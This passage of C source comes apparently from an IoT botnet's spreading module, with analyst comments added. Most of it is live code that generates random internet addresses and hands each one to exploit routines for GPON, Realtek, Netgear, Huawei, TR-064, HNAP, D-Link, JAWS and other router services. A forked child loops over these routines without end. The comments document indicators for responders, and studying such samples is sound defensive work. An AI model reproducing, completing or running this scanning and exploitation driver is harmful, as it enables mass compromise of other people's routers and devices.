  377.     sprintf(gpon_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  378.     sprintf(gpon_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  379.    
  380.     exploit_socket_gpon8080(gpon_ip1);exploit_socket_gpon8080(gpon_ip2);exploit_socket_gpon8080(gpon_ip3);exploit_socket_gpon8080(gpon_ip4);exploit_socket_gpon8080(gpon_ip5);exploit_socket_gpon8080(gpon_ip6);
  381. }
  382.  
  // Builds six dotted-quad strings and passes each to exploit_socket_gpon80, which forks once per
  // address. The first octet of each address is taken from GPON2_Range; the other three are
  // rand() % 255 (0-254). rand() is reseeded from time(NULL) on every call, and the octets are
  // staged in the shared ipState buffer (slots 0-23).
  // Seen from the network this is unsolicited TCP/80 traffic to scattered addresses.
  383. void GPON80_IPGen()
  384. {
  385.     char gpon2_ip1[16] = {0};char gpon2_ip2[16] = {0};char gpon2_ip3[16] = {0};
  386.     char gpon2_ip4[16] = {0};char gpon2_ip5[16] = {0};char gpon2_ip6[16] = {0};
  387.    
  388.     srand(time(NULL));
  389.     int gpon2_range1 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range2 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range3 = rand() % (sizeof(GPON2_Range)/sizeof(char *));
  390.     int gpon2_range4 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range5 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range6 = rand() % (sizeof(GPON2_Range)/sizeof(char *));
  391.    
  392.     ipState[0] = GPON2_Range[gpon2_range1];ipState[4] = GPON2_Range[gpon2_range2];ipState[8] = GPON2_Range[gpon2_range3];
  393.     ipState[12] = GPON2_Range[gpon2_range4];ipState[16] = GPON2_Range[gpon2_range5];ipState[20] = GPON2_Range[gpon2_range6];
  394.     ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;
  395.     ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;
  396.     ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;
  397.    
  398.     sprintf(gpon2_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon2_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  399.     sprintf(gpon2_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon2_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  400.     sprintf(gpon2_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon2_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  401.    
  402.     exploit_socket_gpon80(gpon2_ip1);exploit_socket_gpon80(gpon2_ip2);exploit_socket_gpon80(gpon2_ip3);exploit_socket_gpon80(gpon2_ip4);exploit_socket_gpon80(gpon2_ip5);exploit_socket_gpon80(gpon2_ip6);
  403. }
  404.  
  // Builds ten dotted-quad strings and passes each to exploit_socket_realtek, which forks once per
  // address. For every address the first octet is rand() % 233 (0-232) and the other three are
  // rand() % 255 (0-254); all 40 slots of the shared ipState buffer are used. rand() is reseeded
  // from time(NULL) on every call.
  // Seen from the network this is unsolicited TCP/52869 traffic to scattered addresses.
  405. void REALTEK_IPGen()
  406. {  
  407.     char realtek_ip1[16] = {0};char realtek_ip2[16] = {0};char realtek_ip3[16] = {0};char realtek_ip4[16] = {0};char realtek_ip5[16] = {0};
  408.     char realtek_ip6[16] = {0};char realtek_ip7[16] = {0};char realtek_ip8[16] = {0};char realtek_ip9[16] = {0};char realtek_ip10[16] = {0};
  409.  
  410.     srand(time(NULL));
  411.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
  412.     ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
  413.     ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
  414.     ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
  415.     ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;
  416.     ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;
  417.     ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;
  418.     ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;
  419.    
  420.     sprintf(realtek_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(realtek_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  421.     sprintf(realtek_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(realtek_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  422.     sprintf(realtek_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(realtek_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  423.     sprintf(realtek_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(realtek_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);
  424.     sprintf(realtek_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(realtek_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);
  425.    
  426.     exploit_socket_realtek(realtek_ip1);exploit_socket_realtek(realtek_ip2);exploit_socket_realtek(realtek_ip3);exploit_socket_realtek(realtek_ip4);exploit_socket_realtek(realtek_ip5);
  427.     exploit_socket_realtek(realtek_ip6);exploit_socket_realtek(realtek_ip7);exploit_socket_realtek(realtek_ip8);exploit_socket_realtek(realtek_ip9);exploit_socket_realtek(realtek_ip10);
  428. }
  429.  
  // Builds ten dotted-quad strings and passes each to exploit_socket_netgear, which forks once per
  // address. For every address the first octet is rand() % 233 (0-232) and the other three are
  // rand() % 255 (0-254); all 40 slots of the shared ipState buffer are used. rand() is reseeded
  // from time(NULL) on every call.
  // Seen from the network this is unsolicited TCP/8080 and TCP/80 traffic to scattered addresses.
  430. void NETGEAR_IPGen()
  431. {  
  432.     char netgear_ip1[16] = {0};char netgear_ip2[16] = {0};char netgear_ip3[16] = {0};char netgear_ip4[16] = {0};char netgear_ip5[16] = {0};
  433.     char netgear_ip6[16] = {0};char netgear_ip7[16] = {0};char netgear_ip8[16] = {0};char netgear_ip9[16] = {0};char netgear_ip10[16] = {0};
  434.  
  435.     srand(time(NULL));
  436.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
  437.     ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
  438.     ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
  439.     ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
  440.     ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;
  441.     ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;
  442.     ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;
  443.     ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;
  444.    
  445.     sprintf(netgear_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(netgear_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  446.     sprintf(netgear_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(netgear_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  447.     sprintf(netgear_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(netgear_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  448.     sprintf(netgear_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(netgear_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);
  449.     sprintf(netgear_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(netgear_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);
  450.    
  451.     exploit_socket_netgear(netgear_ip1);exploit_socket_netgear(netgear_ip2);exploit_socket_netgear(netgear_ip3);exploit_socket_netgear(netgear_ip4);exploit_socket_netgear(netgear_ip5);
  452.     exploit_socket_netgear(netgear_ip6);exploit_socket_netgear(netgear_ip7);exploit_socket_netgear(netgear_ip8);exploit_socket_netgear(netgear_ip9);exploit_socket_netgear(netgear_ip10);
  453. }
  454.  
  // Builds five dotted-quad strings and passes each to exploit_socket_huawei, which forks once per
  // address. For every address the first octet is rand() % 233 (0-232) and the other three are
  // rand() % 255 (0-254), staged in ipState slots 0-19. rand() is reseeded from time(NULL) on
  // every call.
  // Seen from the network this is unsolicited TCP/37215 traffic to scattered addresses.
  455. void HUAWEI_IPGen()
  456. {  
  457.     char huawei_ip1[16] = {0};char huawei_ip2[16] = {0};char huawei_ip3[16] = {0};char huawei_ip4[16] = {0};char huawei_ip5[16] = {0};
  458.  
  459.     srand(time(NULL));
  460.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
  461.     ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
  462.     ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
  463.     ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
  464.    
  465.     sprintf(huawei_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(huawei_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  466.     sprintf(huawei_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(huawei_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  467.     sprintf(huawei_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);
  468.    
  469.     exploit_socket_huawei(huawei_ip1);
  470.     exploit_socket_huawei(huawei_ip2);
  471.     exploit_socket_huawei(huawei_ip3);
  472.     exploit_socket_huawei(huawei_ip4);
  473.     exploit_socket_huawei(huawei_ip5);
  474. }
  475.  
  // Builds one dotted-quad string (first octet rand() % 233, i.e. 0-232; other octets rand() % 255,
  // i.e. 0-254) in ipState slots 0-3 and passes it to exploit_socket_tr064, which forks for it.
  // rand() is reseeded from time(NULL) on every call.
  // Seen from the network this is unsolicited TCP/7574 and TCP/5555 traffic to a random address.
  476. void TR064_IPGen()
  477. {  
  478.     char tr_ip1[16] = {0};
  479.  
  480.     srand(time(NULL));
  481.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  482.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  483.    
  484.     sprintf(tr_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  485.    
  486.     exploit_socket_tr064(tr_ip1);
  487. }
  488.  
  // Builds one dotted-quad string (first octet rand() % 233, i.e. 0-232; other octets rand() % 255,
  // i.e. 0-254) in ipState slots 0-3 and passes it to exploit_socket_hnap, which forks for it.
  // rand() is reseeded from time(NULL) on every call.
  // Seen from the network this is an unsolicited TCP/80 request for /HNAP1/ to a random address.
  489. void HNAP_IPGen()
  490. {  
  491.     char hnap_ip1[16] = {0};
  492.  
  493.     srand(time(NULL));
  494.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  495.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  496.    
  497.     sprintf(hnap_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  498.    
  499.     exploit_socket_hnap(hnap_ip1);
  500. }
  501.  
  502. void CROSSWEB_IPGen()
  503. {  
           // Analyst note: builds one pseudo-random dotted-quad IPv4 string and passes
           // it to exploit_socket_crossweb(), which is defined outside this part of the
           // listing. Takes no arguments and returns nothing. The octets are stored in
           // the file-scope ipState[] array (slots 0..3).
  504.     char crossweb_ip1[16] = {0};
  505.  
           // Reseeded from time(NULL) on each call: two calls within the same second
           // produce identical octets, which helps correlate probes in traffic logs.
  506.     srand(time(NULL));
           // First octet is 0..232, the other three 0..254; no range filtering is done.
  507.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  508.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  509.    
           // uint8_t octets keep the text within 15 characters, so the 16-byte buffer
           // (terminator included) is not overrun.
  510.     sprintf(crossweb_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  511.    
  512.     exploit_socket_crossweb(crossweb_ip1);
  513. }
  514.  
  515. void JAWS_IPGen()
  516. {  
           // Analyst note: builds one pseudo-random dotted-quad IPv4 string and passes
           // it to exploit_socket_jaws(), which is defined outside this part of the
           // listing. Takes no arguments and returns nothing. The octets are stored in
           // the file-scope ipState[] array (slots 0..3).
  517.     char jaws_ip1[16] = {0};
  518.  
           // Reseeded from time(NULL) on each call: two calls within the same second
           // produce identical octets, which helps correlate probes in traffic logs.
  519.     srand(time(NULL));
           // First octet is 0..232, the other three 0..254; no range filtering is done.
  520.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  521.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  522.    
           // uint8_t octets keep the text within 15 characters, so the 16-byte buffer
           // (terminator included) is not overrun.
  523.     sprintf(jaws_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  524.    
  525.     exploit_socket_jaws(jaws_ip1);
  526. }
  527.  
  528. void DLINK_IPGen()
  529. {  
           // Analyst note: builds one pseudo-random dotted-quad IPv4 string and passes
           // it to exploit_socket_dlink(), which is defined outside this part of the
           // listing. Takes no arguments and returns nothing. The octets are stored in
           // the file-scope ipState[] array (slots 0..3).
  530.     char dlink_ip1[16] = {0};
  531.  
           // Reseeded from time(NULL) on each call: two calls within the same second
           // produce identical octets, which helps correlate probes in traffic logs.
  532.     srand(time(NULL));
           // First octet is 0..232, the other three 0..254; no range filtering is done.
  533.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  534.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  535.    
           // uint8_t octets keep the text within 15 characters, so the 16-byte buffer
           // (terminator included) is not overrun.
  536.     sprintf(dlink_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  537.    
  538.     exploit_socket_dlink(dlink_ip1);
  539. }
  540.  
  541. void R7000_IPGen()
  542. {  
           // Analyst note: builds one pseudo-random dotted-quad IPv4 string and passes
           // it on to a sender defined outside this part of the listing. Takes no
           // arguments and returns nothing. The octets are stored in the file-scope
           // ipState[] array (slots 0..3).
  543.     char r7000_ip1[16] = {0};
  544.  
           // Reseeded from time(NULL) on each call: two calls within the same second
           // produce identical octets, which helps correlate probes in traffic logs.
  545.     srand(time(NULL));
           // First octet is 0..232, the other three 0..254; no range filtering is done.
  546.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  547.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  548.    
           // uint8_t octets keep the text within 15 characters, so the 16-byte buffer
           // (terminator included) is not overrun.
  549.     sprintf(r7000_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  550.    
           // Naming differs from the caller: the sender is spelled "r7064", not
           // "r7000". Search for that spelling when tracing this path.
  551.     exploit_socket_r7064(r7000_ip1);
  552. }
  553.  
  554. void VARCON_IPGen()
  555. {  
           // Analyst note: builds one pseudo-random dotted-quad IPv4 string and passes
           // it on to a sender defined outside this part of the listing. Takes no
           // arguments and returns nothing. The octets are stored in the file-scope
           // ipState[] array (slots 0..3).
  556.     char varcon_ip1[16] = {0};
  557.  
           // Reseeded from time(NULL) on each call: two calls within the same second
           // produce identical octets, which helps correlate probes in traffic logs.
  558.     srand(time(NULL));
           // First octet is 0..232, the other three 0..254; no range filtering is done.
  559.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;
  560.     ipState[2] = rand() % 255;ipState[3] = rand() % 255;
  561.    
           // uint8_t octets keep the text within 15 characters, so the 16-byte buffer
           // (terminator included) is not overrun.
  562.     sprintf(varcon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  563.    
           // Spelling differs from the caller: the sender is "vacron", this routine is
           // "VARCON". Search for both when tracing this path.
  564.     exploit_socket_vacron(varcon_ip1);
  565. }
  566.  
  567. void exploit_worker(void)
  568. {  
           // Analyst note: forks once. The parent returns immediately (also when fork()
           // fails), and the child stays in the loop below with no exit path in this
           // function. The child's pid is kept in the file-scope exploit_pid.
           // For responders: the activity comes from a child process, so stopping the
           // foreground parent alone does not end it.
           // This local counter shadows the file-scope variable of the same name.
  569.     int i = 0;
  570.     exploit_pid = fork();
  571.    
  572.     if (exploit_pid > 0 || exploit_pid == -1)
  573.         return;
  574.     restart:
           // i counts passes. Once it exceeds 10 the child prints a fixed status line,
           // sleeps 12 seconds and subtracts 10 before looping again. The literal
           // string below is a stable marker for string-based identification.
  575.     i++;
  576.     if (i > 10)
  577.     {
  578.         printf("[Pwn] Sleeping For 12 Seconds\n");
  579.         sleep(12);
  580.         i = i - 10;
  581.         goto restart;
  582.     }
           // One pass: twelve generator calls in a fixed order, each preceded by a
           // 300 ms pause. The fixed order and pacing give the traffic a regular
           // rhythm. GPON8080/GPON80/REALTEK/NETGEAR generators are defined earlier in
           // the file, outside this part of the listing.
  583.         usleep(300000);
  584.         GPON8080_IPGen();
  585.         usleep(300000);
  586.         GPON80_IPGen();
  587.         usleep(300000);
  588.         REALTEK_IPGen();
  589.         usleep(300000);
  590.         NETGEAR_IPGen();
  591.         usleep(300000);
  592.         HUAWEI_IPGen();
  593.         usleep(300000);
  594.         TR064_IPGen();
  595.         usleep(300000);
  596.         HNAP_IPGen();
  597.         usleep(300000);
  598.         CROSSWEB_IPGen();
  599.         usleep(300000);
  600.         JAWS_IPGen();
  601.         usleep(300000);
  602.         DLINK_IPGen();
  603.         usleep(300000);
  604.         R7000_IPGen();
  605.         usleep(300000);
  606.         VARCON_IPGen();
  607.         goto restart;
  608. }
  609.  
  610. void exploit_kill(void)
  611. {
           // Analyst note: sends signal 9 (SIGKILL on Linux) to the pid that
           // exploit_worker() stored in exploit_pid. Nothing in this part of the
           // listing calls it.
           // NOTE(review): exploit_pid is not validated. A value of -1 (failed fork)
           // makes kill() address every process the caller may signal, and 0 (its
           // initial value) addresses the caller's own process group. Keep this in
           // mind when running the sample in an analysis environment.
  612.     kill(exploit_pid, 9);
  613. }
  614.  
  615. int main(int argc, char const *argv[])
  616. {
           // Analyst note: starts the forked worker, then keeps the parent in the
           // foreground until two consecutive newlines arrive on stdin. argc and argv
           // are not used. main returns without calling exploit_kill(), so as far as
           // this listing shows the forked child keeps running after the parent exits.
  617.     exploit_worker();
  618.     char prev = 0;
  619.     while(1)
  620.         {
               // getchar() returns int but the result is stored in a char, and EOF is
               // never compared. With stdin closed or at end of input the call
               // returns at once and the loop never breaks, so the parent spins on
               // the CPU -- a visible host-side indicator.
  621.             char c = getchar();
  622.             if(c == '\n' && prev == c)
  623.             {
  624.             // double return pressed!
  625.                 break;
  626.             }
  627.             prev = c;
  628.         }
  629.     return 0;
  630. }